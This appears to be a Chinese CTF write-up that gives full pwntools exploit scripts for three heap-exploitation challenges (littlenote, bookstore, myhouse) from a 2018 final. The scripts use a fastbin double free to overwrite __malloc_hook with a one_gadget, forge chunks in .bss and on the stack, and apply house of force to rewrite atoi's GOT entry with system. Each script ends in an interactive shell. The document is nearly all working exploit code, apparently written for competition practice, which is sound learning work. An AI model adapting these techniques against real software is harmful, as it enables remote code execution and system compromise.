
2018铁三赛决赛三道pwn题exp


0x01 littlenote

double free和写malloc_hook

from pwn import *

#context.log_level="debug"
p = process("./littlenote")  # local target; the libc loaded below must be the one this binary links against
libc = ELF("./libc.so.6")  # only used for its symbol table (__malloc_hook is looked up further down)

def add(data):
    """Menu option 1: create a note.

    Waits for the menu prompt, selects option 1, sends *data* verbatim
    (send(), no trailing newline) at the note prompt, then answers the
    keep-confirmation with "Y" followed by a NUL byte.
    """
    menu_choice = "1"
    p.recvuntil("choice:")
    p.sendline(menu_choice)
    p.recvuntil("your note")
    p.send(data)
    p.recvuntil("keep your note?")
    p.send("Y\x00")

def show(idx):
    """Menu option 2: ask the program to print note *idx*."""
    exchanges = (("choice:", "2"), ("show?", str(idx)))
    for prompt, reply in exchanges:
        p.recvuntil(prompt)
        p.sendline(reply)

def dele(idx):
    """Menu option 3: delete note *idx* (the program does not check for repeats)."""
    option = str(3)
    target = str(idx)
    p.recvuntil("choice:")
    p.sendline(option)
    p.recvuntil("delete?")
    p.sendline(target)

# Exploit flow for ./littlenote (see heading: double free, then a write over __malloc_hook).
# Every numeric offset below belongs to the libc.so.6 shipped with the challenge;
# re-derive them before running against any other build.
add("A"*0x10)  # notes are referred to by 0-based index below, presumably in creation order
add("B"*0x10)
add("C"*0x10)
add("D"*0x10+p64(0)+p64(0x51))  # note data ends with a forged 0x51 size field
dele(1)
dele(0)
dele(1)  # the double free: index 1 is deleted a second time
show(0)  # note 0 was just freed; whatever it prints now is parsed as a heap address
p.recvline()
heap = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
print hex(heap)
add(p64(heap+0x10)+p64(0x71))  # note content shaped as a pointer + 0x71 size field
add("\x00")
add(p64(heap+0x10)+p64(0x71))
add("F"*0x50+p64(0)+p64(0x91))  # forged 0x91 size field, same idea as the 0x51 above
dele(2)
show(2)  # note 2 was just freed; the printed value is treated as a pointer into libc
p.recvline()
main = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
libc_addr = (main - 88) - 0x3C4B20  # 88 and 0x3C4B20 are build-specific; TODO confirm against the shipped libc
print hex(libc_addr)
malloc_hook = libc_addr + libc.symbols['__malloc_hook']  # symbol offset read from the ELF, not hard-coded
print hex(malloc_hook)
add("1"*0x10) #8
add("2"*0x10) #9
add("3"*0x10)
dele(9)
dele(8)
dele(9)  # second double free, same pattern as with indices 1/0/1
add(p64(malloc_hook-27-0x8))  # 27 and 0x8 are chosen for this libc's bytes around __malloc_hook; TODO confirm
add("5"*0x10)
add(p64(malloc_hook-27-0x8))
one_gadget = 0xf0274  # build-specific libc offset; TODO confirm
add("A"*19+p64(libc_addr + one_gadget))  # 19 bytes of padding, then the address written over the hook
p.recvuntil(":")
p.sendline(str(1))  # option 1 once more: the next allocation goes through the overwritten hook
p.interactive()

0x02 bookstore

在bss段和stack上伪造chunk

from pwn import *

def ru(data, drop=False):
    """Read from the target until *data* is seen; *drop* strips the delimiter from the result."""
    received = p.recvuntil(data, drop=drop)
    return received

def rl():
    """Read one line from the target (thin wrapper over recvline)."""
    line = p.recvline()
    return line

def ra():
    """Drain everything the target still has to send (recvall)."""
    remainder = p.recvall()
    return remainder

def r(l):
    """Forward a recv(*l*) call to the target connection and return its result."""
    chunk = p.recv(l)
    return chunk

def sl(data):
    """Send *data* followed by a newline."""
    writer = p.sendline
    writer(data)

def s(data):
    """Send *data* as-is (no newline appended)."""
    writer = p.send
    writer(data)

def ga(data, rd="\x0a"):
    """Skip past *data*, then parse the bytes up to *rd* as a zero-padded little-endian u64."""
    ru(data)
    raw = ru(rd, drop=True)
    padded = raw.ljust(8, "\x00")
    return u64(padded)

def g():
    """Attach gdb to the target, then block until a line is read from stdin."""
    attach = gdb.attach
    attach(p)
    ri()

def ri():
    """Pause the script until a line is entered on stdin (Python 2 raw_input)."""
    pause = raw_input
    pause()

def add(author, l, book):
    """Menu option 1: add a book.

    The option byte "1" is padded with seven NULs to eight bytes; *author*,
    the length *l* and *book* are then sent at their respective prompts.
    """
    dialogue = (
        ("choice:", "1" + "\x00" * 0x7),
        ("author", author),
        ("long", str(l)),
        ("book?", book),
    )
    for prompt, reply in dialogue:
        ru(prompt)
        sl(reply)

def read(idx):
    """Menu option 3: have the program print book *idx*."""
    option = str(3)
    ru(":")
    sl(option)
    ru("sell")
    sl(str(idx))

def sell(idx):
    """Menu option 2: sell (release) book *idx*."""
    for prompt, reply in ((":", "2"), ("sell", str(idx))):
        ru(prompt)
        sl(reply)

def et():
    """Menu option 4."""
    option = "4"
    ru(":")
    sl(option)

if __name__ == '__main__':
    # Exploit flow for ./bookstore (see heading: forged chunks in .bss and on the stack).
    # Every absolute value below belongs to the shipped libc.so.6 / binary;
    # re-derive them before running against any other build.
    #context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./bookstore")
    add("A"*0x10,0x10,"1"*0x8)  # books are referred to by 0-based index below, presumably in creation order
    add("B"*0x10,0x40,"2"*0x10)
    add("C"*0x10,0x40,"3"*0x10) 
    add("D"*0x10,0x40,"4"*0x10) 
    sell(0)
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0xa1))  # author/book bytes laid out as forged size fields (0x51, 0xa1)
    sell(1)
    add("W"*0x10,0x40,'6'*8)
    read(1)
    main = ga("6"*0x8)  # bytes printed right after the "6"*8 marker, parsed as a pointer into libc
    libc_addr = (main - 232) - 0x3C4B20  # 232 and 0x3C4B20 are build-specific; TODO confirm
    print hex(libc_addr)
    env = libc_addr + libc.symbols['environ']  # environ (symbol from the ELF) is read back below to find the stack
    print hex(env)
    sell(0)
    sell(1)
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0x51)+p64(0x602060))  # 0x602060: address inside the binary; TODO confirm
    add("X"*0x10,0x40,'2'*0x10)
    add("Z"*0x10,0x40,p64(0)*2+p64(env))
    read(0)
    stack = ga("name:")  # value printed after "name:", parsed as a stack address
    print hex(stack)
    fake = stack - 0x110  # stack slot used for the forged chunk; 0x110 depends on this binary/environment
    print hex(fake)
    one = libc_addr + 0x45216  # build-specific libc offset; TODO confirm
    add("A"*0x10,0x10,"1"*0x8)
    add("B"*0x10,0x20,"2"*0x10)
    add("C"*0x10,0x20,"3"*0x10) 
    sell(5)
    sell(6)
    add('s'*0x10,0,p64(0)*3+p64(0x31)+p64(fake))  # forged 0x31 size field followed by the stack address
    add("B"*0x10,0x20,"2"*0x10)
    add('A'*0x10,0x20,p64(0)+p64(0x400c70)+p64(one))  # 0x400c70: address inside the binary; TODO confirm
    et()  # menu option 4
    p.interactive()

0x03 myhouse

一个任意地址写null漏洞和house of force

from pwn import *

def ru(data, drop=False):
    """Read from the target up to and including *data* (excluded when *drop* is true)."""
    return p.recvuntil(
        data,
        drop=drop,
    )

def rl():
    """Return the next line sent by the target."""
    reader = p.recvline
    return reader()

def ra():
    """Return everything remaining on the connection (recvall)."""
    reader = p.recvall
    return reader()

def r(l):
    """Forward recv(*l*) to the target connection."""
    reader = p.recv
    return reader(l)

def sl(data):
    """Send *data* plus a newline."""
    outgoing = data
    p.sendline(outgoing)

def s(data):
    """Send *data* without a trailing newline."""
    outgoing = data
    p.send(outgoing)

def ga(data, rd="\x0a"):
    """Consume up to *data*, then decode the bytes before *rd* as a zero-padded little-endian u64."""
    ru(data)
    value_bytes = ru(rd, drop=True).ljust(8, "\x00")
    value = u64(value_bytes)
    return value

def g():
    """Attach gdb to the target process and wait for Enter on stdin."""
    gdb.attach(p)
    ri()

def ri():
    """Block until a line is read from stdin (used as a manual breakpoint)."""
    wait = raw_input
    wait()

def gp():
    """Print the target's pid (for attaching a debugger by hand) and wait for Enter."""
    pid = proc.pidof(p)[0]
    print pid
    ri()

def add(n, hn, hs1, hs, hd):
    """Answer the initial house-creation dialogue.

    Sends (with send(), no newline) the player name *n*, the house name *hn*,
    a first size *hs1* (after which the program prints "Too large!"), a second
    size *hs*, and finally the description *hd*.
    """
    dialogue = (
        ("What's your name?", n),
        ("name of your house?", hn),
        ("size of your house?", str(hs1)),
        ("Too large!", str(hs)),
        ("description:\n", hd),
    )
    for prompt, reply in dialogue:
        ru(prompt)
        s(reply)

def broom(rs):
    """Menu option 1: build a room of size *rs*."""
    for prompt, reply in (("choice:", "1"), ("size of your room", str(rs))):
        ru(prompt)
        sl(reply)

def droom(rd):
    """Menu option 2: decorate the room with the raw bytes *rd* (sent with a newline)."""
    option = str(2)
    ru("choice:")
    sl(option)
    ru("more shining")
    sl(rd)

def view():
    """Menu option 3: have the program print the house."""
    option = "3"
    ru("choice:")
    sl(option)

if __name__ == '__main__':
    # Exploit flow for ./myhouse (see heading: a null-byte write, then house of force).
    # The constants top, bss and atoi below belong to the shipped libc.so.6 / binary;
    # re-derive them before running against any other build.
    # context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./myhouse")
    top = 0x3c4b78  # libc-relative offset folded into the first size answer; TODO confirm
    size = 0x201000
    ps = size - 0x10 + top + 1  # first size answer; the program replies "Too large!" to it (see add())
    # mmap to libc before, modify top chunk low bit to null
    add("A"*0x20 ,"1"*0xf0+p64(0)+p64(0xffffffffffffffff),ps,0x200000,'2'*0x20)  # house name ends in an all-ones 8-byte size field
    view()
    heap = ga("A"*0x20)  # bytes printed after the 0x20 'A's, parsed as a heap address
    bss = 0x6020b0  # address inside the binary; TODO confirm
    hs = bss - (heap + 0x100)  # distance from the current heap position to bss, requested as the next room size
    print hex(heap)
    print hex(hs)
    # modify top chunk to bss segment
    broom(hs)
    # alloc chunk in bss segment 
    broom(0x60)
    atoi = 0x602058  # GOT slot address inside the binary; TODO confirm
    pay = p64(atoi) + p64(atoi) + p64(8)
    # modify the ptr to got
    droom(pay)
    # leak the real address of atoi by printing through the redirected pointer
    view()
    atoi_addr = ga("description:\x0a")
    print hex(atoi_addr)
    system_addr = atoi_addr -libc.symbols['atoi'] + libc.symbols['system']  # both symbol offsets come from the ELF
    print hex(system_addr)
    # modify got of atoi to system addr
    droom(p64(system_addr))
    ru("choice:")
    # get shell: the menu input is passed to the replaced atoi
    s("/bin/sh\x00")
    ru("choice:")    
    p.interactive()